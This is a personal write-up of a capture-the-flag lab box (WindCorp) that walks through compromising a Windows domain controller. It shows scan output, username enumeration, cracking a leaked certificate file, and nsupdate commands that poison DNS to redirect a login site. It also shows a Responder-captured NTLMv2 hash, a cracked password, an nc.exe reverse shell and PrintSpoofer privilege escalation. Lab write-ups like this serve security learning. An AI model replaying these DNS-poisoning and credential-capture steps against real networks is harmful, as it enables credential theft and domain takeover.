WindCorp recently had a security-breach. Since then they have hardened their infrastructure, learning from their mistakes. But maybe not enough? You have managed to enter their local network… My first hard box. Let’s go.
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Did not follow redirect to https://fire.windcorp.thm/ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-11 13:15:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm | Not valid before: 2020-05-29T03:31:08 |_Not valid after: 2028-05-29T03:41:03 |_ssl-date: 2022-09-11T13:16:52+00:00; -1s from scanner time. 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm | Not valid before: 2020-05-29T03:31:08 |_Not valid after: 2028-05-29T03:41:03 |_http-server-header: Microsoft-HTTPAPI/2.0 |_ssl-date: 2022-09-11T13:16:52+00:00; -1s from scanner time. |_http-title: Not Found | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name) |_ssl-date: 2022-09-11T13:16:52+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm | Not valid before: 2020-05-29T03:31:08 |_Not valid after: 2028-05-29T03:41:03 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name) |_ssl-date: 2022-09-11T13:16:54+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm | Not valid before: 2020-05-29T03:31:08 |_Not valid after: 2028-05-29T03:41:03 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name) |_ssl-date: 2022-09-11T13:16:52+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm | Not valid before: 2020-05-29T03:31:08 |_Not valid after: 2028-05-29T03:41:03 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=Fire.windcorp.thm | Not valid before: 2022-09-10T13:14:18 |_Not valid after: 2023-03-12T13:14:18 |_ssl-date: 2022-09-11T13:16:52+00:00; -1s from scanner time. 5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later |_ssl-date: 2022-09-11T13:16:53+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm | Not valid before: 2020-05-01T08:39:00 |_Not valid after: 2025-04-30T08:39:00 | xmpp-info: | STARTTLS Failed | info: | features: | capabilities: | stream_id: 4wt2q8eu3n | xmpp: | version: 1.0 | errors: | invalid-namespace | (timeout) | compression_methods: | auth_mechanisms: |_ unknown: 5269/tcp open xmpp Wildfire XMPP Client | xmpp-info: | STARTTLS Failed | info: | features: | errors: | (timeout) | xmpp: | capabilities: | compression_methods: | auth_mechanisms: |_ unknown: 7070/tcp open http Jetty 9.4.18.v20190429 |_http-title: Openfire HTTP Binding Service |_http-server-header: Jetty(9.4.18.v20190429) 7443/tcp open ssl/http Jetty 9.4.18.v20190429 | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm | Not valid before: 2020-05-01T08:39:00 |_Not valid after: 2025-04-30T08:39:00 |_http-server-header: Jetty(9.4.18.v20190429) |_http-title: Openfire HTTP Binding Service 7777/tcp open socks5 (No authentication; connection not allowed by ruleset) | socks-auth-info: |_ No authentication 9090/tcp open zeus-admin?
Our first nmap scan gives a lot back, so it’s going to be lots of vectors for enumeration.
Starting with DNS to see if there’s any other subdomains we missed from the LDAP script.
dig windcorp.thm ANY @10.10.176.220 [30/1427]
; <<>> DiG 9.18.4-2-Debian <<>> windcorp.thm ANY @10.10.176.220
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9005
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;windcorp.thm. IN ANY
;; ANSWER SECTION:
windcorp.thm. 600 IN A 10.10.176.220
windcorp.thm. 3600 IN NS fire.windcorp.thm.
windcorp.thm. 3600 IN SOA fire.windcorp.thm. hostmaster.windcorp.thm. 294 900 600 86400 3600
windcorp.thm. 86400 IN TXT "THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources}"
;; ADDITIONAL SECTION:
fire.windcorp.thm. 3600 IN A 10.10.176.220
fire.windcorp.thm. 3600 IN A 192.168.112.1 We get our first flag and a hint to the next step. We learn we might be able to do some DNS poisoning but I’ve no idea how…
Let’s hop onto the web app and instantly we’re given an invalid SSL certificate. Inspecting gives up some subdomains. Nmap gave us this anyway but always good to check.
So we can add these to /etc/hosts and continue to have a poke around.
We see they’re using Jabber and get a list of usernames for future use. Let’s run them against Kerberos quickly using Kerbrute…
2022/09/11 16:18:42 > [+] VALID USERNAME: tinygoose102@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: Edeltraut@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: angrybird253@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: Emile@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: organicfish718@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: buse@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: brownostrich284@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: sadswan869@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: goldencat416@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: whiteleopard529@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: orangegorilla428@windcorp.thm 2022/09/11 16:18:42 > [+] VALID USERNAME: happymeercat399@windcorp.thm
Well, that might be handy for the future…
Gobuster gives http://fire.windcorp.thm/powershell which is something we need credentials to log into.
The subdomain selfservice.windcorp.thm gives us a login form.
We can see it’s using NTLM to login so we’ll have to come back to it later.
Gobuster comes up with a /backup/ directory in the selfservice.dev.windcorp.thm subdomain. It contains a file cert.pfx
which is a PKCS#12 format and “contains the SSL certificate (public keys) and the corresponding private keys” – Google
┌──(kali㉿kali)-[~/Desktop/thm/ra/files]
└─$ openssl pkcs12 -info -in cert.pfx
Enter Import Password:
Can't read Password
┌──(kali㉿kali)-[~/Desktop/thm/ra/files]
└─$ pfx2john cert.pfx > pfxhash Of course there’s a PFX2John tool, so let’s see if we can extract this.
┌──(kali㉿kali)-[~/Desktop/thm/ra/files]
└─$ openssl pkcs12 -info -in cert.pfx
Enter Import Password:
MAC: sha256, Iteration 2000
MAC length: 32, salt length: 20
PKCS7 Data
Shrouded Keybag: PBES2, PBKDF2, AES-256-CBC, Iteration 2000, PRF hmacWithSHA256
Bag Attributes
Microsoft Local Key set: <No Values>
localKeyID: 01 00 00 00
friendlyName: te-4b942170-a078-48b3-80cb-e73333376b73
Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
X509v3 Key Usage: 90
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIFLTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQIRFnvY2oIX2MCAggA
MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBC20gukPIUnQIQ+t/wTDJYgBIIE
0BF3nOuCGwal2aH/IFrqJzU0ORufbNKOJ2PAvF/NytcvkyxzgXX7twvnBhQRtPfZ
KXLKsPUxPpSt9XRNvBdtxMdii1xFFksTAYrlvFKhyJjpzqSP6UmjkMjxyAzPERst
YI/+d+tTpAsfDgSRM5BwvunpcJ/gZlWa6teip71RA032nOE8Q9VEIf1s1en816Bs
lvBAg24KwF80sSmhZWL3KeS2yhph/fZIhEc52kvXW2YdqZLKUZaQy3lJBXPIbYU6
MgNs0pMc0VmmcEAR4i1uBagq4slgDjMW2dUG0kfKhOj1iyn41YxVfOU+yoNOcLZ8
jpRdkDb8HAP5yVGHpFxUbaLgjXXiZa421NjfNd5XGvFtIlSwgiemIYSOR3QikeqP
J/Blu2/rajTCmKmdw9GCqCxZHIYyYFaUcG9olqLW+7zrGL9X/z3tSM8EcgHGfdn4
gFM/30lqgRw44mVwJzc+FJgDKpcetmHaojInE5e2RXt8CwQ/9h8Vj3kAat9g/LYN
pvpbZrQMSMx5WJX6Rolh/cXRNbBoW7GoGlSiSGlGBAuz1UlDa2sSpNVbpD4BjHAC
qdT1OAMfa9qJAt6F8FHIekYiCYlgP00SiJYIGqCsltvp4ygtQzOjaCzlupvz0pKA
HbSmUyQaM6CZOSMbqqqXXQJ2PPRwDiZijPijnQ8HFsBDOn3f7zFpH1siwJit9d/h
MY6rxhdtVC/XaKAeJ/KzHyn4mjLsU29XjZEu3aqRIZQdp7VrykJLE77MQsj2SyuG
0/WTwX6wujkjeOvL8E+aOm4JevYgN60txfJAs2f+AourqIBX24gvXYS56CFht/yX
6IX655DkE6sgeVZed73+mGanzZUVm/dl/wO8Q+D49GXjrdgVbRK6O1Epha6O5dnF
4ji1Rc3QvXBu3r5UCdB97FK3G9rjGiYM1OC8Lb59US9rWx3KFJfTKgUYKi9a7bhq
7Hq1+HJGVJppnH62RkSY6R6Rr7yqKldlEM/JOxxgP4cHQsKile7aSsvNYdcS+KU0
jsHXjtJOjaNBQDMnYt0u8tZdX+3tJIw3mtQLW+I+LpNt2SMZyjpvphBO7mjkP3ZP
g1pdhaRIhIkg1nDd+QURcLz12mAY3iMXJLWcXBTLDy0BJ5o6acBF9IOTScez3UYN
T/m/OXv247pB0zm7SCJWPh/SDyMF61HVf/HXoaATYeA48xUynRNcykvPcu/SsYY5
eZwUZF8u5ISd5VxAyGtpMERw9/GYVPM4cFpSPN3xHyQNf4ov0lBjRzeEGdtiY0xI
RquX9JDR/OX0XerfrC3hGUBBdJmG37klrbq85+t4ELSI6HyIMl3eqS1l+QfoL5r8
+sQALSLwbCE32y+hSAWsyrI7buGf84AQ46xwnwXv49uAmhIU3yeeWkMktqaXxxMm
Tgvujh1jBUlYOHHAdCNm2JNTRdqmAVJgD2GOt97X3WstH2KnoaHPm8I3usCGYMly
FeaFgt6voOZkqG37g13yZIilmP+nf8EUjV3I/C3ULGjiq+WL5diX2Z2A/bCvoARz
NuY8crcLcGAy2qjELEcc/TjiLrPIv3Qfdu96GirpFlN8SSR9yFpq1dyZTQ+iKgpo
cBb8SAJe1t36mNpZHIGjNlH5h7IJnldTAyU/5wkAxVHO
-----END ENCRYPTED PRIVATE KEY-----
KCS7 Encrypted data: PBES2, PBKDF2, AES-256-CBC, Iteration 2000, PRF hmacWithSHA256
Certificate bag
Bag Attributes
localKeyID: 01 00 00 00
subject=CN = fire.windcorp.thm
issuer=CN = fire.windcorp.thm
-----BEGIN CERTIFICATE-----
MIIDajCCAlKgAwIBAgIQUI2QvXTCj7RCVdv6XlGMvjANBgkqhkiG9w0BAQsFADAc
MRowGAYDVQQDDBFmaXJlLndpbmRjb3JwLnRobTAeFw0yMDA1MjkwMzMxMDhaFw0y
ODA1MjkwMzQxMDNaMBwxGjAYBgNVBAMMEWZpcmUud2luZGNvcnAudGhtMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv900af0f6n80F0J6U9jMgcwQrozr
kXmi02esW1XAsHpWnuuMQDIN6AtiYmDcoFEXz/NteLI7T6PusqQ6SXqLBurTnR8V
InPD3Qea6lxOXNjuNeqqZKHhUaXiwSaqtAB+GzPkNtevw3jeEj99ST/G1qwY9Xce
sfeqR2J4kQ+8U5yKLJDPBxOSx3+SHjKErrLTk66lrlEi4atr+P/ccXA5TBkZFkYh
i3YdKTDnYeP2fMrqvOqpw82eniHAGJ2N8JJbNep86ps8giIRieBUUclF/WCp4c33
p4i1ioVxJIYJj6f0tjGhy9GxB7l69OtUutcIG0/FhxL2dQ86MmnHH0dE7QIDAQAB
o4GnMIGkMA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYB
BQUHAwEwVAYDVR0RBE0wS4IRZmlyZS53aW5kY29ycC50aG2CGHNlbGZzZXJ2aWNl
LndpbmRjb3JwLnRobYIcc2VsZnNlcnZpY2UuZGV2LndpbmRjb3JwLnRobTAdBgNV
HQ4EFgQUIZvYlCIhAOFLRutycf6U2H6LhqIwDQYJKoZIhvcNAQELBQADggEBAKVC
ZS6HOuSODERi/glj3rPJaHCStxHPEg69txOIDaM9fX4WBfmSjn+EzlrHLdeRS22h
nTPirvuT+5nn6xbUrq9J6RCTZJD+uFc9wZl7Viw3hJcWbsO8DTQAshuZ5YJ574pG
HjyoVDOfYhy8/8ThvYf1H8/OaIpG4UIo0vY9qeBQBOPZdbdVjWNerkFmXVq+MMVf
pAt+FffQE/48kTCppuSKeM5ZMgHP1/zhZqyJ3npljVDlgppjvh1loSYB+reMkhwK
2gpGJNwxLyFDhTMLaj0pzFL9okqs5ovEWEj8p96hEE6Xxl4ZApv6mxTs9j2oY6+P
MTUqFyYKchFUeYlgf7k=
-----END CERTIFICATE-----Knowing that we’ve got a login authenticating with NTLM on the website I spent a lot of time digging and with some help from the THM Discord I learn that Responder can poison HTTPS requests and you can specify the certificate inside /usr/share/responder/Responder.conf.
; Configure SSL Certificates to use
SSLCert = certs/responder.crt
SSLKey = certs/responder.key
┌──(kali㉿kali)-[/usr/share/responder/certs]
└─$ sudo cp ~/Desktop/thm/ra/files/selfservice.cert.pem .
┌──(kali㉿kali)-[/usr/share/responder/certs]
└─$ sudo cp ~/Desktop/thm/ra/files/selfservice.key.pem . Having set our new certificates we’ll need to learn how to do the DNS poisoning…
──(kali㉿kali)-[~] └─$ nsupdate > server 10.10.44.245 > update add potato.windcorp.thm 5 TXT "Test" > send
We can test the theory that the DNS server allows unauthenticated updates with nsupdate. Adding a new TXT record for a subdomain and following it up with nslookup.
nslookup > server 10.10.44.245 Default server: 10.10.44.245 Address: 10.10.44.245#53 > set type=txt > potato.windcorp.thm Server: 10.10.44.245 Address: 10.10.44.245#53 potato.windcorp.thm text = "Test"
So with this knowledge we can add a new record, when staff try to authenticate to selfservice.windcorp.thm
nsupdate > server 10.10.44.245 > update delete selfservice.windcorp.thm > update add selfservice.windcorp.thm 12345 A 10.18.105.64 > send > quit
After a brief while we get a response. Hooray, some progress!
[HTTP] NTLMv2 Client : 10.10.44.245 [HTTP] NTLMv2 Username : WINDCORP\edwardle [HTTP] NTLMv2 Hash : edwardle::WINDCORP:65fab3635d3d27d3:B2F856E39E12B8AF9B734F63DFF5A6EE:0101000000000000EBFD28B016C6D80134B6B93F8E36275F0000000002000800410053003700360001001E00570049004E002D00450043004100300043003300350052004500450053000400140041005300370036002E004C004F00430041004C0003003400570049004E002D00450043004100300043003300350052004500450053002E0041005300370036002E004C004F00430041004C000500140041005300370036002E004C004F00430041004C000800300030000000000000000100000000200000F7A1363963683FD6DFE899B137F9775C9DDDF96B6D49F964EF52DA400DA9094A0A00100012C690EF73A24A276DC3EDC54B8CC48409003A0048005400540050002F00730065006C00660073006500720076006900630065002E00770069006E00640063006F00720070002E00740068006D000000000000000000
We can quickly pop the hash into Hashcat and get our first set of credentials. Let’s see what edwardle can do. We’ll use crackmapexec to see what sort of access we have, whether we can WinRM or if there’s some shares we can access.
smbmap -u edwardle -p '!Angelus25!' -H 10.10.4.17
[+] IP: 10.10.4.17:445 Name: fire.windcorp.thm
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYWhen we connect to the Users share, we see edwardles folder. Inside, on the desktop we can grab Flag 2.txt, further around the folders inside documents we see “surfsup.cmd” which might be a scheduled task.
Weirdly in Downloads there’s an nc binary, a dll and SweetPotato.exe
smb: \edwardle.WINDCORP\Downloads\> ls . DR 0 Sat May 30 20:53:54 2020 .. DR 0 Sat May 30 20:53:54 2020 desktop.ini AHS 282 Fri May 29 06:31:47 2020 nc.exe A 59392 Sat May 30 20:53:54 2020 NtApiDotNet.dll A 1761792 Sat May 30 20:37:29 2020 SweetPotato.exe A 153600 Sat May 30 20:38:03 2020
To see if surfsup.cmd is a scheduled task, I’ll see if I can ping myself.
Right, now we can utilise that NC.exe and set up a reverse shell. I’ll start a listener in metasploit to see if we can use any meterpreter tools.
We can’t upgrade the shell, so before running winpeas I’ll run sharphound and explore the domain with Bloodhound.
We can see that we can PSRemote into the computer, but we can’t psexec and psremoting won’t work properly. Going back through my notes I remember the powershell directory, and see we can specify the computer to connect to.
It’s really janky to use, so using nc.exe we can pop another shell. Now with elevated privileges I imagine that’s where SweetPotato.exe comes in. For the life of me I cannot figure out how to use SweetPotato but having used PrintSpoofer in the past I see SweetPotato is using that anyway. We can use PrintSpoofer to pop a privileged shell and with that we root the box.
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 84E1-0562
Directory of c:\Users\Administrator\Desktop
06/01/2020 10:36 AM <DIR> .
06/01/2020 10:36 AM <DIR> ..
05/31/2020 02:32 AM 47 Flag 3.txt
1 File(s) 47 bytes
2 Dir(s) 43,615,412,224 bytes freeThis room taught me a lot and felt like a realistic experience. No flags hidden in anonymous shares. I had to do a lot of learning and digging, but it was a rewarding process.